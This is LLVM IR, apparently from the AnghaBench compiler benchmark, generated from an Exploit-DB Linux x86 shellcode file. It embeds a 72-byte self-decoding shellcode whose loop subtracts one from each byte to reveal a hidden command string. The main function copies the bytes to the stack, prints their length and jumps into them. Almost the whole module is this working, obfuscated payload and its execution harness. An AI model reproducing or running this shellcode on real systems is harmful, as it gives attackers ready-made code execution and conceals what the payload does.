; ModuleID = '/home/carl/AnghaBench/exploitdb/shellcodes/linux_x86/extr_13599.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/shellcodes/linux_x86/extr_13599.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@__const.main.shellcode = private unnamed_addr constant [72 x i8] c"\EB\11^1\C9\B1G\80l\0E\FF\01\80\E9\01u\F6\EB\05\E8\EA\FF\FF\FFk\0CY\9ASgi.G\8A\E2Sktgimfi7ubcio0jqi0tcji0vts\8A\E4SRT\8A\E2\CE\81\00", align 16
@stdout = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [12 x i8] c"Length: %d\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8**, align 8
  %5 = alloca [72 x i8], align 16
  store i32 %0, i32* %3, align 4
  store i8** %1, i8*** %4, align 8
  %6 = bitcast [72 x i8]* %5 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %6, i8* align 16 getelementptr inbounds ([72 x i8], [72 x i8]* @__const.main.shellcode, i32 0, i32 0), i64 72, i1 false)
  %7 = load i32, i32* @stdout, align 4
  %8 = getelementptr inbounds [72 x i8], [72 x i8]* %5, i64 0, i64 0
  %9 = call i32 @strlen(i8* %8)
  %10 = call i32 @fprintf(i32 %7, i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str, i64 0, i64 0), i32 %9)
  %11 = getelementptr inbounds [72 x i8], [72 x i8]* %5, i64 0, i64 0
  %12 = bitcast i8* %11 to void (...)*
  call void (...) %12()
  ret i32 0
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1

declare dso_local i32 @fprintf(i32, i8*, i32) #2

declare dso_local i32 @strlen(i8*) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
